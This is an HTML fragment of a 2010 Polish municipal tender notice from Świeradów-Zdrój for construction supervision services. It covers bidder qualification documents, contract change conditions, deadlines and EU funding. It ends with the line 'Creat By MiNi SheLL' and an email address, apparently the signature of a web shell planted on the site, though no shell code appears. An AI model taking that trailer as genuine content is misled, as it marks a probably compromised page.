<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany przedmiotu umowy ,umówionego terminu wykonania zamówienia lub wysokości wynagrodzenia mogą nastąpić w przypadku wystąpienia jednej z poniższych okoliczności: a)ograniczenia zakresu usługi w związku z ograniczeniem zakresu nadzorowanych robót budowlanych, wynikających z braku środków finansowych, b)konieczności zmiany terminu realizacji umowy z uwagi na zmianę terminu nadzorowanych robót budowlanych, w przypadku wystąpienia tzw. siły wyższej, tj. przez siłę wyższą należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od Wykonawcy robót budowlanych i Zamawiającego, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy o nadzorowane roboty budowlane, których Wykonawca robót budowlanych i Zamawiający nie mogli przewidzieć i którym nie mogli zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla stosunków zobowiązaniowych, c) z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno-gospodarczych lub z innych powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę, d)zmiana postanowień niniejszej umowy w przypadku zmiany powszechnie obowiązującego prawa, e) w przypadku zaistnienia niesprzyjających i nietypowych warunków atmosferycznych dla okresu i miejsca wykonywanych nadzorowanych robót budowlanych, potwierdzonych wpisem do dziennika budowy, odbiegających od wymagań STWiORB które powodują konieczność zmiany terminu wykonania usługi, f) z powodu istotnych braków lub błędów w dokumentacji projektowej dotyczącej nadzorowanych robót budowlanych, również tych polegających na niezgodności dokumentacji z przepisami prawa, które powodują konieczność zmiany terminu wykonania usługi g) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez Zamawiającego,Wykonawcę nadzorowanych robót budowlanych, jeżeli zmiany te są korzystne dla Zmawiającego, h) z powodu wystąpienia dodatkowych robót budowlanych powodujących powodujących postanie dodatkowych usług nadzoru , niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego Zleceniobiorcę usług, i) z powodu wystąpienia dodatkowych robót  budowlanych, których nie można prowadzić łącznie z robotami podstawowymi, które powodują konieczność zmiany terminu wykonania usługi ,j) z powodu działań osób trzecich uniemożliwiających wykonanie usługi, które to działania nie są konsekwencją winy którejkolwiek ze stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um-swieradow.bip.pbox.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój pokój 21a.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2010 godzina 12:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój sekretariat 1d..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 Fundusze Europejskie - dla rozwoju Dolnego Śląska.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com